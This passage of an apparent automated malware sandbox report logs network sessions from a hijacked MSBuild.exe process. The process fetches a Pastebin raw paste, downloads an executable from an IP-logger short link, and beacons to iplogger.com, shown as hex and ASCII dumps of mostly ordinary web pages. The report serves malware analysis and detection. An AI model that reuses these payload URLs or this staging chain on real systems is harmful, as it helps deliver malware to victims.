.logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:20:22 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:20:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49729	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:27 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:20:28 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4336c76f7bc472-EWR
2024-09-16 19:20:28 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:20:28 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:20:28 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:20:28 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:20:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49730	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:28 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:20:29 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:20:28 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:20:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PF1bH%2FpuDitndHBDs47qh7Wb1W4QRdYALbpTqCfsQfdHaEedHBJmTRjuRL67j4%2B8N7r9wHzvZaap3QqZu3k%2F9ynV7GeT6etVXPjTL4t3rCHIRkDXEEACzGc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4336ccedb10fa1-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:20:29 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:20:29 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:20:29 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:20:29 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:20:29 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:20:29 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:20:29 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:20:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49732	104.21.76.57	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:33 UTC	68	OUT	GET /1djqU4 HTTP/1.1 Host: iplogger.com Connection: Keep-Alive
2024-09-16 19:20:34 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Mon, 16 Sep 2024 19:20:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-09-16 19:20:34 UTC	689	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 66 57 7a 4b 74 79 69 35 6c 75 75 4d 35 52 71 64 4c 48 47 32 68 75 4f 43 47 59 63 69 41 72 63 65 77 6c 35 5a 2b 63 4f 65 57 75 4b 37 52 30 37 65 54 50 43 42 30 6e 2f 7a 37 69 4f 52 62 50 32 7a 69 30 59 6a 44 38 51 48 30 31 74 38 51 73 52 68 6e 61 69 47 2f 52 77 73 78 41 4f 52 43 44 54 52 53 70 6e 42 32 35 6b 50 6a 68 55 3d 24 4b 75 44 30 6e 63 57 45 63 4d 63 2b 56 4f 72 74 63 75 6d 45 72 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: fWzKtyi5luuM5RqdLHG2huOCGYciArcewl5Z+cOeWuK7R07eTPCB0n/z7iORbP2zi0YjD8QH01t8QsRhnaiG/RwsxAORCDTRSpnB25kPjhU=$KuD0ncWEcMc+VOrtcumErg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 34 30 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 40ef<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
